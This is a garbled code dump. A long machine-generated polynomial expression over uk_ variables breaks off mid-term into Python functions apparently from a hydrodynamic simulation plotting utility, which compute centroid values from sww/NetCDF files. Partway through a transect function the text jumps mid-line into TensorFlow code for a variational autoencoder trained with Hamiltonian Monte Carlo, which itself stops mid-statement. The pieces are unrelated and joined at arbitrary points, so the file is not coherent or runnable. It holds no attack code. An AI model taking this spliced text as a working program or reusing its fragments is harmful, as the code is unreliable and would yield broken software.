+ 250047 * uk_81
+ 170667 * uk_82
+ 63504 * uk_83
+ 174636 * uk_84
+ 377055 * uk_85
+ 861273 * uk_86
+ 63504 * uk_87
+ 116487 * uk_88
+ 43344 * uk_89
+ 2242306609 * uk_9
+ 119196 * uk_90
+ 257355 * uk_91
+ 587853 * uk_92
+ 43344 * uk_93
+ 16128 * uk_94
+ 44352 * uk_95
+ 95760 * uk_96
+ 218736 * uk_97
+ 16128 * uk_98
+ 121968 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 244440 * uk_100
+ 546840 * uk_101
+ 108360 * uk_102
+ 592767 * uk_103
+ 1326087 * uk_104
+ 262773 * uk_105
+ 2966607 * uk_106
+ 587853 * uk_107
+ 116487 * uk_108
+ 4913 * uk_109
+ 805001 * uk_11
+ 12427 * uk_110
+ 11560 * uk_111
+ 28033 * uk_112
+ 62713 * uk_113
+ 12427 * uk_114
+ 31433 * uk_115
+ 29240 * uk_116
+ 70907 * uk_117
+ 158627 * uk_118
+ 31433 * uk_119
+ 2036179 * uk_12
+ 27200 * uk_120
+ 65960 * uk_121
+ 147560 * uk_122
+ 29240 * uk_123
+ 159953 * uk_124
+ 357833 * uk_125
+ 70907 * uk_126
+ 800513 * uk_127
+ 158627 * uk_128
+ 31433 * uk_129
+ 1894120 * uk_13
+ 79507 * uk_130
+ 73960 * uk_131
+ 179353 * uk_132
+ 401233 * uk_133
+ 79507 * uk_134
+ 68800 * uk_135
+ 166840 * uk_136
+ 373240 * uk_137
+ 73960 * uk_138
+ 404587 * uk_139
+ 4593241 * uk_14
+ 905107 * uk_140
+ 179353 * uk_141
+ 2024827 * uk_142
+ 401233 * uk_143
+ 79507 * uk_144
+ 64000 * uk_145
+ 155200 * uk_146
+ 347200 * uk_147
+ 68800 * uk_148
+ 376360 * uk_149
+ 10275601 * uk_15
+ 841960 * uk_150
+ 166840 * uk_151
+ 1883560 * uk_152
+ 373240 * uk_153
+ 73960 * uk_154
+ 912673 * uk_155
+ 2041753 * uk_156
+ 404587 * uk_157
+ 4567633 * uk_158
+ 905107 * uk_159
+ 2036179 * uk_16
+ 179353 * uk_160
+ 10218313 * uk_161
+ 2024827 * uk_162
+ 401233 * uk_163
+ 79507 * uk_164
+ 3969 * uk_17
+ 1071 * uk_18
+ 2709 * uk_19
+ 63 * uk_2
+ 2520 * uk_20
+ 6111 * uk_21
+ 13671 * uk_22
+ 2709 * uk_23
+ 289 * uk_24
+ 731 * uk_25
+ 680 * uk_26
+ 1649 * uk_27
+ 3689 * uk_28
+ 731 * uk_29
+ 17 * uk_3
+ 1849 * uk_30
+ 1720 * uk_31
+ 4171 * uk_32
+ 9331 * uk_33
+ 1849 * uk_34
+ 1600 * uk_35
+ 3880 * uk_36
+ 8680 * uk_37
+ 1720 * uk_38
+ 9409 * uk_39
+ 43 * uk_4
+ 21049 * uk_40
+ 4171 * uk_41
+ 47089 * uk_42
+ 9331 * uk_43
+ 1849 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 38119212353 * uk_47
+ 96419184187 * uk_48
+ 89692264360 * uk_49
+ 40 * uk_5
+ 217503741073 * uk_50
+ 486580534153 * uk_51
+ 96419184187 * uk_52
+ 187944057 * uk_53
+ 50715063 * uk_54
+ 128279277 * uk_55
+ 119329560 * uk_56
+ 289374183 * uk_57
+ 647362863 * uk_58
+ 128279277 * uk_59
+ 97 * uk_6
+ 13685017 * uk_60
+ 34615043 * uk_61
+ 32200040 * uk_62
+ 78085097 * uk_63
+ 174685217 * uk_64
+ 34615043 * uk_65
+ 87555697 * uk_66
+ 81447160 * uk_67
+ 197509363 * uk_68
+ 441850843 * uk_69
+ 217 * uk_7
+ 87555697 * uk_70
+ 75764800 * uk_71
+ 183729640 * uk_72
+ 411024040 * uk_73
+ 81447160 * uk_74
+ 445544377 * uk_75
+ 996733297 * uk_76
+ 197509363 * uk_77
+ 2229805417 * uk_78
+ 441850843 * uk_79
+ 43 * uk_8
+ 87555697 * uk_80
+ 250047 * uk_81
+ 67473 * uk_82
+ 170667 * uk_83
+ 158760 * uk_84
+ 384993 * uk_85
+ 861273 * uk_86
+ 170667 * uk_87
+ 18207 * uk_88
+ 46053 * uk_89
+ 2242306609 * uk_9
+ 42840 * uk_90
+ 103887 * uk_91
+ 232407 * uk_92
+ 46053 * uk_93
+ 116487 * uk_94
+ 108360 * uk_95
+ 262773 * uk_96
+ 587853 * uk_97
+ 116487 * uk_98
+ 100800 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 249480 * uk_100
+ 546840 * uk_101
+ 42840 * uk_102
+ 617463 * uk_103
+ 1353429 * uk_104
+ 106029 * uk_105
+ 2966607 * uk_106
+ 232407 * uk_107
+ 18207 * uk_108
+ 29791 * uk_109
+ 1467943 * uk_11
+ 16337 * uk_110
+ 38440 * uk_111
+ 95139 * uk_112
+ 208537 * uk_113
+ 16337 * uk_114
+ 8959 * uk_115
+ 21080 * uk_116
+ 52173 * uk_117
+ 114359 * uk_118
+ 8959 * uk_119
+ 805001 * uk_12
+ 49600 * uk_120
+ 122760 * uk_121
+ 269080 * uk_122
+ 21080 * uk_123
+ 303831 * uk_124
+ 665973 * uk_125
+ 52173 * uk_126
+ 1459759 * uk_127
+ 114359 * uk_128
+ 8959 * uk_129
+ 1894120 * uk_13
+ 4913 * uk_130
+ 11560 * uk_131
+ 28611 * uk_132
+ 62713 * uk_133
+ 4913 * uk_134
+ 27200 * uk_135
+ 67320 * uk_136
+ 147560 * uk_137
+ 11560 * uk_138
+ 166617 * uk_139
+ 4687947 * uk_14
+ 365211 * uk_140
+ 28611 * uk_141
+ 800513 * uk_142
+ 62713 * uk_143
+ 4913 * uk_144
+ 64000 * uk_145
+ 158400 * uk_146
+ 347200 * uk_147
+ 27200 * uk_148
+ 392040 * uk_149
+ 10275601 * uk_15
+ 859320 * uk_150
+ 67320 * uk_151
+ 1883560 * uk_152
+ 147560 * uk_153
+ 11560 * uk_154
+ 970299 * uk_155
+ 2126817 * uk_156
+ 166617 * uk_157
+ 4661811 * uk_158
+ 365211 * uk_159
+ 805001 * uk_16
+ 28611 * uk_160
+ 10218313 * uk_161
+ 800513 * uk_162
+ 62713 * uk_163
+ 4913 * uk_164
+ 3969 * uk_17
+ 1953
the output of get_output, OR from a
filename
See _read_output or _get_centroid_values for further explanation of
arguments
e.g.
# Case 1 -- get vertex values first, then centroids
p = plot_utils.get_output('my_sww.sww', minimum_allowed_height=0.01)
pc=util.get_centroids(p, velocity_extrapolation=True)
# Case 2 -- get centroids directly
pc=plot_utils.get_centroids('my_sww.sww', velocity_extrapolation=True)
NOTE: elevation is only stored once in the output, even if it was
stored every timestep.
Lots of existing plotting code assumes elevation is a 1D
array.
But as a hack for the time being the elevation from the file
is available via elev_orig
"""
def __init__(self, p, velocity_extrapolation=False, verbose=False,
timeSlices=None, minimum_allowed_height=1.0e-03):
self.time, self.x, self.y, self.stage, self.xmom,\
self.ymom, self.height, self.elev, self.elev_orig, self.friction, self.xvel,\
self.yvel, self.vel, self.xllcorner, self.yllcorner, self.timeSlices= \
_get_centroid_values(p, velocity_extrapolation,\
timeSlices=copy.copy(timeSlices),\
minimum_allowed_height=minimum_allowed_height,\
verbose=verbose)
def _getCentVar(fid, varkey_c, time_indices, absMax=False, vols = None, space_indices=None):
"""
Convenience function used to get centroid variables from netCDF
file connection fid
"""
if vols is not None:
vols0 = vols[:,0]
vols1 = vols[:,1]
vols2 = vols[:,2]
    if varkey_c not in fid.variables:
# It looks like centroid values are not stored
# In this case, compute centroid values from vertex values
assert (vols is not None), "Must specify vols since centroid quantity is not stored"
newkey=varkey_c.replace('_c','')
if time_indices != 'max':
# Relatively efficient treatment is possible
var_cent = fid.variables[newkey]
if (len(var_cent.shape)>1):
# array contain time slices
var_cent = numpy.zeros((len(time_indices), fid.variables[newkey].shape[1]), dtype='float32')
for i in range(len(time_indices)):
var_cent[i,:] = fid.variables[newkey][time_indices[i]]
var_cent = (var_cent[:,vols0]+var_cent[:,vols1]+var_cent[:,vols2])/3.0
else:
var_cent = fid.variables[newkey][:]
var_cent = (var_cent[vols0]+var_cent[vols1]+var_cent[vols2])/3.0
else:
# Requires reading all the data
tmp = fid.variables[newkey][:]
try: # array contain time slices
tmp=(tmp[:,vols0]+tmp[:,vols1]+tmp[:,vols2])/3.0
except:
tmp=(tmp[vols0]+tmp[vols1]+tmp[vols2])/3.0
var_cent=getInds(tmp, timeSlices=time_indices, absMax=absMax)
else:
if time_indices != 'max':
if(len(fid.variables[varkey_c].shape)>1):
var_cent = numpy.zeros((len(time_indices), fid.variables[varkey_c].shape[1]), dtype='float32')
for i in range(len(time_indices)):
var_cent[i,:] = fid.variables[varkey_c][time_indices[i]]
else:
var_cent = fid.variables[varkey_c][:]
else:
var_cent=getInds(fid.variables[varkey_c][:], timeSlices=time_indices, absMax=absMax)
if space_indices is not None:
# Maybe only return particular space indices. Could do this more
# efficiently by only reading those indices initially, if that proves
# important
if (len(var_cent.shape)>1):
var_cent = var_cent[:,space_indices]
else:
var_cent = var_cent[space_indices]
return var_cent
def _get_centroid_values(p, velocity_extrapolation, verbose, timeSlices,
minimum_allowed_height):
"""
Function to get centroid information -- main interface is through
get_centroids.
See get_centroids for usage examples, and read_output or get_output for further relevant info
Input:
p -- EITHER:
The result of e.g. p=util.get_output('mysww.sww').
See the get_output class defined above.
OR:
Alternatively, the name of an sww file
velocity_extrapolation -- If true, and centroid values are not
in the file, then compute centroid velocities from vertex velocities, and
centroid momenta from centroid velocities. If false, and centroid values
are not in the file, then compute centroid momenta from vertex momenta,
and centroid velocities from centroid momenta
timeSlices = list of integer indices when we want output for, or
'all' or 'last' or 'max'. See _read_output
minimum_allowed_height = height at which velocities are zeroed. See _read_output
Output: Values of x, y, Stage, xmom, ymom, elev, xvel, yvel, vel etc at centroids
"""
# Figure out if p is a string (filename) or the output of get_output
pIsFile = isinstance(p, str)
if(pIsFile):
fid=NetCDFFile(p)
else:
fid=NetCDFFile(p.filename)
# UPDATE: 15/06/2014 -- below, we now get all variables directly from the file
# This is more flexible, and allows to get 'max' as well
    # However, it could potentially have performance penalties vs the old approach (?)
# Make 3 arrays, each containing one index of a vertex of every triangle.
vols=fid.variables['volumes'][:]
vols0=vols[:,0]
vols1=vols[:,1]
vols2=vols[:,2]
# Get lower-left offset
xllcorner=fid.xllcorner
yllcorner=fid.yllcorner
#@ Get timeSlices
# It will be either a list of integers, or 'max'
l=len(vols)
time=fid.variables['time'][:]
nts=len(time) # number of time slices in the file
if(timeSlices is None):
if(pIsFile):
# Assume all timeSlices
timeSlices=list(range(nts))
else:
timeSlices=copy.copy(p.timeSlices)
else:
# Treat word-based special cases
if(timeSlices == 'all'):
timeSlices=list(range(nts))
if(timeSlices == 'last'):
timeSlices=[nts-1]
#@ Get minimum_allowed_height
if(minimum_allowed_height is None):
if(pIsFile):
minimum_allowed_height=0.
else:
minimum_allowed_height=copy.copy(p.minimum_allowed_height)
# Treat specification of timeSlices
if(timeSlices=='all'):
inds=list(range(len(time)))
elif(timeSlices=='last'):
inds=[len(time)-1]
elif(timeSlices=='max'):
inds='max' #
else:
try:
inds=list(timeSlices)
except:
inds=[timeSlices]
if(inds != 'max'):
time=time[inds]
else:
        # There is no single time associated with 'max'; use max(time) as a
        # reasonable (if slightly misleading) placeholder value
time=time.max()
# Get coordinates
x=fid.variables['x'][:]
y=fid.variables['y'][:]
x_cent=(x[vols0]+x[vols1]+x[vols2])/3.0
y_cent=(y[vols0]+y[vols1]+y[vols2])/3.0
# Stage and height and elevation
stage_cent = _getCentVar(fid, 'stage_c', time_indices=inds, vols=vols)
elev_cent = _getCentVar(fid, 'elevation_c', time_indices=inds, vols=vols)
    # Hack to allow reference to time-varying elevation
elev_cent_orig = elev_cent
if(len(elev_cent.shape)==2):
# Coerce to 1D array, since lots of our code assumes it is
elev_cent=elev_cent[0,:]
# Friction might not be stored at all
try:
friction_cent = _getCentVar(fid, 'friction_c', time_indices=inds, vols=vols)
except:
friction_cent=elev_cent*0.+numpy.nan
# Trick to treat the case where inds == 'max'
inds2 = copy.copy(inds)
if inds == 'max':
inds2 = list(range(len(fid.variables['time'])))
# height
height_cent= stage_cent + 0.
for i in range(stage_cent.shape[0]):
height_cent[i,:] = stage_cent[i,:] - elev_cent
if 'xmomentum_c' in fid.variables:
# The following commented out lines seem to only work on
# some numpy/netcdf versions. So we loop
#xmom_cent = fid.variables['xmomentum_c'][inds2]
#ymom_cent = fid.variables['ymomentum_c'][inds2]
xmom_cent = numpy.zeros((len(inds2), fid.variables['xmomentum_c'].shape[1]), dtype='float32')
ymom_cent = numpy.zeros((len(inds2), fid.variables['ymomentum_c'].shape[1]), dtype='float32')
height_c_tmp = numpy.zeros((len(inds2), fid.variables['stage_c'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_cent[i,:] = fid.variables['xmomentum_c'][inds2[i]]
ymom_cent[i,:] = fid.variables['ymomentum_c'][inds2[i]]
if 'height_c' in fid.variables:
height_c_tmp[i,:] = fid.variables['height_c'][inds2[i]]
else:
height_c_tmp[i,:] = fid.variables['stage_c'][inds2[i]] - elev_cent
# Vel
hInv = 1.0/(height_c_tmp + 1.0e-12)
hWet = (height_c_tmp > minimum_allowed_height)
xvel_cent = xmom_cent*hInv*hWet
yvel_cent = ymom_cent*hInv*hWet
else:
# Get important vertex variables
xmom_v = numpy.zeros((len(inds2), fid.variables['xmomentum'].shape[1]), dtype='float32')
ymom_v = numpy.zeros((len(inds2), fid.variables['ymomentum'].shape[1]), dtype='float32')
stage_v = numpy.zeros((len(inds2), fid.variables['stage'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_v[i,:] = fid.variables['xmomentum'][inds2[i]]
ymom_v[i,:] = fid.variables['ymomentum'][inds2[i]]
stage_v[i,:] = fid.variables['stage'][inds2[i]]
elev_v = fid.variables['elevation']
# Fix elevation + get height at vertices
if (len(elev_v.shape)>1):
elev_v = numpy.zeros(elev_v.shape, dtype='float32')
for i in range(elev_v.shape[0]):
elev_v[i,:] = fid.variables['elevation'][inds2[i]]
height_v = stage_v - elev_v
else:
elev_v = elev_v[:]
height_v = stage_v + 0.
for i in range(stage_v.shape[0]):
height_v[i,:] = stage_v[i,:] - elev_v
# Height at centroids
height_c_tmp = (height_v[:, vols0] + height_v[:,vols1] + height_v[:,vols2])/3.0
# Compute xmom/xvel/ymom/yvel
if velocity_extrapolation:
xvel_v = xmom_v*0.
yvel_v = ymom_v*0.
hInv = 1.0/(height_v+1.0e-12)
hWet = (height_v > minimum_allowed_height)
xvel_v = xmom_v*hInv*hWet
yvel_v = ymom_v*hInv*hWet
# Final xmom/ymom centroid values
xvel_cent = (xvel_v[:, vols0] + xvel_v[:,vols1] + xvel_v[:,vols2])/3.0
xmom_cent = xvel_cent*height_c_tmp
yvel_cent = (yvel_v[:, vols0] + yvel_v[:,vols1] + yvel_v[:,vols2])/3.0
ymom_cent = yvel_cent*height_c_tmp
else:
hInv = 1.0/(height_c_tmp + 1.0e-12)
hWet = (height_c_tmp > minimum_allowed_height)
xmom_v = numpy.zeros((len(inds2), fid.variables['xmomentum'].shape[1]), dtype='float32')
ymom_v = numpy.zeros((len(inds2), fid.variables['ymomentum'].shape[1]), dtype='float32')
for i in range(len(inds2)):
xmom_v[i,:] = fid.variables['xmomentum'][inds2[i]]
ymom_v[i,:] = fid.variables['ymomentum'][inds2[i]]
xmom_cent = (xmom_v[:,vols0] + xmom_v[:,vols1] + xmom_v[:,vols2])/3.0
xvel_cent = xmom_cent*hInv*hWet
ymom_cent = (ymom_v[:,vols0] + ymom_v[:,vols1] + ymom_v[:,vols2])/3.0
yvel_cent = ymom_cent*hInv*hWet
# Velocity
vel_cent = (xvel_cent**2 + yvel_cent**2)**0.5
if inds == 'max':
vel_cent = vel_cent.max(axis=0, keepdims=True)
#vel_cent = getInds(vel_cent, timeSlices=inds)
xmom_cent = getInds(xmom_cent, timeSlices=inds, absMax=True)
ymom_cent = getInds(ymom_cent, timeSlices=inds, absMax=True)
xvel_cent = getInds(xvel_cent, timeSlices=inds, absMax=True)
yvel_cent = getInds(yvel_cent, timeSlices=inds, absMax=True)
fid.close()
return time, x_cent, y_cent, stage_cent, xmom_cent,\
ymom_cent, height_cent, elev_cent, elev_cent_orig, friction_cent,\
xvel_cent, yvel_cent, vel_cent, xllcorner, yllcorner, inds
def animate_1D(time, var, x, ylab=' '):
"""Animate a 2d array with a sequence of 1d plots
Input: time = one-dimensional time vector;
var = array with first dimension = len(time) ;
           x = vector with dimension equal to var.shape[1];
ylab = ylabel for plot
"""
import pylab
import numpy
pylab.close()
pylab.ion()
# Initial plot
vmin=var.min()
vmax=var.max()
line, = pylab.plot( (x.min(), x.max()), (vmin, vmax), 'o')
# Lots of plots
for i in range(len(time)):
line.set_xdata(x)
line.set_ydata(var[i,:])
pylab.draw()
pylab.xlabel('x')
pylab.ylabel(ylab)
pylab.title('time = ' + str(time[i]))
return
def near_transect(p, point1, point2, tol=1.):
# Function to get the indices of points in p less than 'tol' from the line
# joining (x1,y1), and (x2,y2)
# p comes from util.get_output('mysww.sww')
#
# e.g.
# import util
# from matplotlib import pyplot
# p=util.get_output('merewether_1m.sww',0.01)
# p2=util.get_centroids(p,velocity_extrapolation=True)
# #xxx=transect_interpolate.near_transect(p,[95., 85.], [120.,68.],tol=2.)
# xxx=util.near_transect(p,[95., 85.], [120.,68.],tol=2.)
# pyplot.scatter(xxx[1],p.vel[140,xxx[0]],color='red')
x1=point1[0]
y1=point1[1]
x2=point2[0]
y2=point2[1]
z=None, batch=None: self._prior_posterior(z=z, batch=batch)[:2]
#self._recog = lambda images, z=None: self._prior_posterior(images=images, z=z, encoder=self._encoder)[:2]
pass
else:
if encoder_type == "dense":
self._encoder = DenseEncoder(
"encoder", num_outputs=num_outputs, activation=tf.nn.softplus)
self._decoder = DenseDecoder(
"decoder", output_shape=output_shape, activation=tf.nn.softplus)
elif encoder_type == "conv":
self._encoder = ConvEncoder("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv2":
self._encoder = ConvEncoder2("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder2("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv3":
self._encoder = ConvEncoder3("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder3("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
elif encoder_type == "conv4":
self._encoder = ConvEncoder4("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder4("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
if prior_type == "simple":
self._prior = SimplePrior("prior", num_dims=self._z_dims)
elif prior_type == "simple_3d":
self._prior = Simple3DPrior("prior", shape=conv_z_shape)
if bijector_type == "iaf":
recog = DenseRecognitionIAF(
"recog", encoder=self._encoder, condition_iaf=condition_bijector)
elif bijector_type == "rnvp":
recog = DenseRecognitionRNVP(
"recog",
encoder=self._encoder,
condition_bijector=condition_bijector)
elif bijector_type == "shift_scale":
recog = DenseRecognition(
"recog",
encoder=self._encoder)
elif bijector_type == "conv_shift_scale":
recog = ConvShiftScale("recog", encoder=self._encoder)
elif bijector_type == "affine":
recog = DenseRecognitionAffine("recog", encoder=self._encoder, z_dims=z_dims)
elif bijector_type == "affine_lr":
recog = DenseRecognitionAffineLR("recog", encoder=self._encoder, z_dims=z_dims, rank=affine_rank)
elif bijector_type == "conv_iaf":
recog = ConvIAF("recog", encoder=self._encoder, condition_iaf=condition_bijector)
self._recog = recog
if dataset.name == "mnist":
self._noise = DenseMNISTNoise("noise", decoder=self._decoder)
else:
self._noise = DenseCIFAR10TNoise("noise", decoder=self._decoder)
def AdjustedStepSize(self):
if self._step_size_warmup > 0:
global_step = tf.train.get_or_create_global_step()
max_step = self._init_step_size * tf.to_float(
global_step) / self._step_size_warmup
return tf.where(global_step > self._step_size_warmup, self._step_size,
tf.minimum(max_step, self._step_size))
else:
return self._step_size
def RecogVars(self):
return self._encoder.variables + self._recog.variables
def GenVars(self):
return (
self._prior.variables + self._decoder.variables + self._noise.variables)
def MakeDLGM(self,
images,
other_z_init=None,
use_other_z_init=None,
num_samples=64):
z, log_q_z, bijector = self._recog(images)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
post_z = z
q_z = z
if use_other_z_init is not None:
z_init = [tf.cond(use_other_z_init, lambda: tf.identity(other_layer_z),
lambda: tf.identity(layer_z)) for other_layer_z, layer_z in zip(z, other_z_init)]
z_init = z
log_q_z = [tf.reduce_mean(layer_log_q_z) for layer_log_q_z in log_q_z]
log_p_z = [tf.reduce_mean(layer_log_p_z) for layer_log_p_z in log_p_z]
log_p_x_z = tf.reduce_mean(log_p_x_z)
klqp = [layer_log_q_z - layer_log_p_z for layer_log_q_z, layer_log_p_z in zip(log_q_z, log_p_z)]
klqp = [tf.maximum(self._min_kl, layer_klqp) for layer_klqp in klqp]
total_klqp = tf.add_n(klqp)
elbo = log_p_x_z - self._beta * total_klqp
def TargetLogProbFn(*z):
for post_z_e, z_e in zip(post_z, z):
tf.logging.info("Shape here: %s %s", post_z_e.shape, z_e.shape)
z_e.set_shape(post_z_e.shape)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
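    # Run a short HMC chain on the unnormalized posterior defined above. When
    # use_neutra is set, the chain runs in the space warped by the recognition
    # network's bijector (the NeuTra trick), which should make the posterior
    # geometry easier for HMC to explore.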
kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=TargetLogProbFn,
step_size=self.AdjustedStepSize(),
num_leapfrog_steps=self._num_leapfrog_steps)
if self._use_neutra:
kernel = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=kernel, bijector=bijector)
states, kernel_results = tfp.mcmc.sample_chain(
num_results=self._num_hmc_steps, current_state=z, kernel=kernel)
z = [tf.stop_gradient(s[-1, Ellipsis]) for s in states]
post_z = z
_, log_q_z, _ = self._recog(images, z=z)
xentpq = -tf.add_n([tf.reduce_mean(layer_log_q_z) for layer_log_q_z in log_q_z])
if self._use_q_z_for_gen:
z = q_z
recon_means, _ = self._noise(None, z)
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
mcmc_log_p = tf.reduce_mean(tf.add_n(log_p_z) + log_p_x_z)
if self._use_neutra:
log_accept_ratio = kernel_results.inner_results.log_accept_ratio
else:
log_accept_ratio = kernel_results.log_accept_ratio
p_accept = tf.reduce_mean(tf.exp(tf.minimum(log_accept_ratio, 0.)))
z, _ = self._prior(batch=num_samples)
sample_means, _ = self._noise(None, z)
return DLGMOutputs(
elbo=elbo,
sample_means=sample_means,
mcmc_log_p=mcmc_log_p,
recon_means=recon_means,
p_accept=p_accept,
post_z=post_z,
post_z_chain=states,
q_z=z_init,
xentpq=xentpq)
def GetPosterior(self, images):
outputs = self.MakeDLGM(images)
return outputs.post_z
def TrainOp(self, data_idx, images):
global_step = tf.train.get_or_create_global_step()
learning_rate = LearningRate(self.train_size, global_step)
if self._save_chain_state:
other_z_init = tf.gather(self._chain_state, data_idx)
use_other_z_init = (
global_step > self._chain_warmup_epochs * self.train_size // TRAIN_BATCH)
else:
other_z_init = None
use_other_z_init = None
outputs = self.MakeDLGM(
images, other_z_init=other_z_init, use_other_z_init=use_other_z_init)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
#gen_opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
utils.LogAndSummarizeMetrics({
"learning_rate": learning_rate,
"elbo": outputs.elbo,
"mcmc_log_p": outputs.mcmc_log_p,
"mcmc_p_accept": outputs.p_accept,
"step_size": self.AdjustedStepSize(),
}, False)
tf.summary.image(
"sample_means", utils.StitchImages(outputs.sample_means))
if self._save_chain_state:
with tf.control_dependencies([outputs.post_z]):
chain_state_update_op = tf.scatter_update(self._chain_state, data_idx,
outputs.post_z)
else:
chain_state_update_op = tf.no_op()
if self._adapt_step_size:
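      # Simple stochastic adjustment of the HMC step size towards the
      # commonly-targeted ~0.65 acceptance rate, clipped to a sane range.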
new_step_size = self._step_size + self._step_size_gain * (outputs.p_accept - 0.651)
new_step_size = tf.clip_by_value(new_step_size, 1e-3, 0.5)
step_size_op = self._step_size.assign(
tf.where(global_step > self._step_size_warmup, new_step_size,
self._step_size))
else:
step_size_op = tf.no_op()
with tf.name_scope("recog_train"):
if self._q_loss_type == "klqp":
loss = -outputs.elbo
elif self._q_loss_type == "symm":
loss = (
self._symm_factor * -outputs.elbo +
(1.0 - self._symm_factor) * outputs.xentpq)
elif self._q_loss_type == "klpq":
loss = outputs.xentpq
if self._save_chain_state:
# Not super efficient...
loss = tf.cond(use_other_z_init, lambda: tf.identity(loss),
lambda: tf.identity(-outputs.elbo))
recog_train_op = tf.contrib.training.create_train_op(
loss,
opt,
summarize_gradients=True,
variables_to_train=self.RecogVars(),
transform_grads_fn=utils.ProcessGradients)
with tf.name_scope("gen_train"):
gen_loss = tf.cond(global_step < self._no_gen_train_steps,
lambda: -outputs.elbo, lambda: -outputs.mcmc_log_p)
gen_train_op = tf.contrib.training.create_train_op(
gen_loss,
opt,
None,
summarize_gradients=True,
variables_to_train=self.GenVars(),
transform_grads_fn=utils.ProcessGradients)
return tf.group(recog_train_op, gen_train_op, chain_state_update_op, step_size_op)
def EvalOp(self, data_idx, images):
outputs = self.MakeDLGM(images)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image(
"recon_means", utils.StitchImages(outputs.recon_means[:64]))
return utils.LogAndSummarizeMetrics({
"elbo": outputs.elbo,
"xentpq": outputs.xentpq,
"mcmc_log_p": outputs.mcmc_log_p,
"mcmc_p_accept": outputs.p_accept,
})
def AIS(self, images, num_chains):
def ProposalLogProbFn(*z):
if self._use_q_z_for_ais:
_, log_p_z, _ = self._recog(images, z=z)
else:
_, log_p_z = self._prior(z)
return tf.add_n(log_p_z)
def TargetLogProbFn(*z):
_, log_p_z = self._prior(z)
_, log_p_x_z = self._noise(images, z)
return tf.add_n(log_p_z) + log_p_x_z
images = tf.tile(images, [num_chains, 1, 1, 1])
if self._use_q_z_for_ais:
z_init, _, _ = self._recog(images)
else:
z_init, _ = self._prior(batch=tf.shape(images)[0])
if self._use_bijector_for_ais:
_, _, bijector = self._recog(images)
else:
bijector = None
ais_outputs = utils.AIS(ProposalLogProbFn, TargetLogProbFn, z_init, bijector=bijector)
recons, _ = self._noise(None, ais_outputs.z_fin)
tf.summary.image("data", utils.StitchImages(images[:64]))
tf.summary.image("recon_means", utils.StitchImages(recons[:64]))
tf.summary.scalar("p_accept", tf.reduce_mean(ais_outputs.p_accept))
return AISOutputs(
log_p=tf.reduce_logsumexp(
tf.reshape(ais_outputs.log_p, [num_chains, -1]) - tf.log(
tf.to_float(num_chains)), 0),
p_accept=ais_outputs.p_accept,
recon=recons,
z_fin=ais_outputs.z_fin)
@gin.configurable("vae")
class VAE(object):
def __init__(self,
z_dims=64,
condition_bijector=False,
bijector_type="iaf",
encoder_type="dense",
beta=1.0,
beta_steps=0,
min_kl=0,
use_q_z_for_ais=False,
dataset=None,
prior_type="simple",
affine_rank=1):
self.train_size = dataset.train_size
if dataset.name == "mnist":
output_shape = [28, 28, 1]
elif dataset.name == "cifar10":
output_shape = [32, 32, 3]
self._z_dims = z_dims
self._beta = beta
self._use_q_z_for_ais = use_q_z_for_ais
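    # If beta_steps > 0, linearly warm up the KL weight beta from 0 to its
    # target value over the first beta_steps training steps (KL annealing);
    # otherwise beta stays constant.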
if beta_steps > 0:
frac = tf.to_float(
tf.train.get_or_create_global_step()) / tf.to_float(beta_steps)
frac = tf.minimum(frac, 1.0)
self._beta = frac * beta
else:
self._beta = tf.constant(beta)
self._min_kl = tf.to_float(min_kl)
if bijector_type == "affine":
# TriL + shift
num_outputs = (z_dims * (z_dims + 1)) // 2 + z_dims
elif bijector_type == "affine_lr":
num_outputs = z_dims * 2 + z_dims * affine_rank
elif condition_bijector and bijector_type not in ["conv_shift_scale", "shift_scale"]:
num_outputs = 3 * z_dims
else:
num_outputs = 2 * z_dims
if encoder_type == "hier_conv":
assert dataset.name == "cifar10"
self._encoder = ConvHierEncoder("encoder")
self._prior_posterior = ConvHierPriorPost("prior_post")
self._decoder = lambda z: self._prior_posterior(z=z)[2]
self._prior = lambda z=None, batch=None: self._prior_posterior(z=z, batch=batch)[:2]
self._recog = lambda images, z=None: self._prior_posterior(images=images, z=z, encoder=self._encoder)[:2]
else:
if encoder_type == "dense":
self._encoder = DenseEncoder(
"encoder", num_outputs=num_outputs, activation=tf.nn.softplus)
self._decoder = DenseDecoder(
"decoder", output_shape=output_shape, activation=tf.nn.softplus)
elif encoder_type == "conv":
self._encoder = ConvEncoder("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv2":
self._encoder = ConvEncoder2("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder2("decoder", output_shape=output_shape)
conv_z_shape = [4, 4, self._z_dims]
elif encoder_type == "conv3":
self._encoder = ConvEncoder3("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder3("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
elif encoder_type == "conv4":
self._encoder = ConvEncoder4("encoder", num_outputs=num_outputs)
self._decoder = ConvDecoder4("decoder", output_shape=output_shape)
conv_z_shape = [8, 8, self._z_dims]
if prior_type == "simple":
self._prior = SimplePrior("prior", num_dims=self._z_dims)
elif prior_type == "simple_3d":
